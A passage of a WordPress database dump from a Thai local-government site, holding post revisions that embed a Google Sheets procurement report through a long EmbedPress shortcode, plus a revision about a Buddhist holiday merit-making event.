class=\"wp-image-1865\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','ทำบุญเนื่องในวันอาสาฬหบูชา และวันเข้าพรรษา','','inherit','closed','closed','','1852-revision-v1','','','2025-07-15 08:29:59','2025-07-15 01:29:59','',1852,'http://pakhaeng.ssk.in.th/?p=1870',0,'revision','',0),
(1871,1,'2025-07-15 08:32:50','2025-07-15 01:32:50','[embedpress embedpress_embeded_link=\'https://docs.google.com/spreadsheets/d/18Al9i8m54QFeeHUxK9Yr6AVWTM3sifGz/edit?usp=sharing&amp;ouid=116408890257525538205&amp;rtpof=true&amp;sd=true\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'800\' align=\'center\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://docs.google.com/spreadsheets/d/18Al9i8m54QFeeHUxK9Yr6AVWTM3sifGz/edit?usp=sharing&#038;ouid=116408890257525538205&#038;rtpof=true&#038;sd=true[/embedpress]','รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ ปีงบประมาณ2567','','inherit','closed','closed','','1571-revision-v1','','','2025-07-15 08:32:50','2025-07-15 01:32:50','',1571,'http://pakhaeng.ssk.in.th/?p=1871',0,'revision','',0),
(1872,1,'2025-07-15 08:33:02','2025-07-15 01:33:02','[embedpress embedpress_embeded_link=\'https://docs.google.com/spreadsheets/d/18Al9i8m54QFeeHUxK9Yr6AVWTM3sifGz/edit?usp=sharing&amp;ouid=116408890257525538205&amp;rtpof=true&amp;sd=true\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'800\' align=\'center\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' 